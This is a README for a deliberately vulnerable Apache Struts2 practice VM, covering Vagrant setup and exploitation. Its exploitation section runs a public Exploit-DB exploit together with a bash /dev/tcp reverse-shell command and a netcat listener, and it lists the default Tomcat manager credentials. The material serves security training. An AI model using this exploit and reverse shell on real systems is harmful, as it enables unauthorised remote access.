Confirmed Vulnerabilities

Requirements:

• Vagrant
• VirtualBox
• SearchSploit (Optional)

Setup

$ git clone https://github.com/evolvesecurity/vuln-struts2-vm.git
$ cd vuln-struts2-vm

Build Virtual Machine

IMPORTANT: The VM currently uses "public networking" (See: Vagrantfile). This should only be used on a secure LAN. Otherwise, "private networking" should be used.

See: https://www.vagrantup.com/docs/virtualbox/networking.html

$ vagrant up # this will raise and provision your machine
$ vagrant ssh
# to get the IP of your machine if unknown:
ubuntu@strut $ ip route

Verification:

You should no visit http://IP:8080 to see if tomcat8 is working. If the url is unavailable, try http://IP:8080/manager with the credentials "tomcat" and "tomcat".

Exploitation:

Open a terminal, then run the command below to start a TCP listner.

$ nc -nvlp 5556

Open a separate terminal, then run the commands to carry out the exploit with a reverse shell. Replace IP-TARGET with the target IPv4 address. Replace IP-LISTNER with your listening host's IPv4 address.

# download exploit from https://www.exploit-db.com/exploits/41570/
# or use searchsploit
$ searchsploit Struts #optional
$ cp /path/to/linux/webapps/41570.py exploit.py
$ python exploit.py "http://IP-TARGET:8080/http-session/hello.action" "bash -i >& /dev/tcp/IP-LISTENER/5556 0>&1"

It may be necessary to modify your exploit.py in order to pass in the command you want.

One option to confirm your exploit is to simply setup a netcat listener and connect back to it.

Troubleshooting:

If you wish to ssh directly into your vm without using the vagrant ssh command, you need to set a password for the ubuntu user. First, ssh into the vm using vagrant ssh and then perform a password reset using passwd ubuntu.

Credits:

The source code for the Apache Struts2 applications was taken from https://github.com/apache/struts-examples. The pom.xml files were modified slightly in order to downgrade Apache Struts2 to a vulnerable version.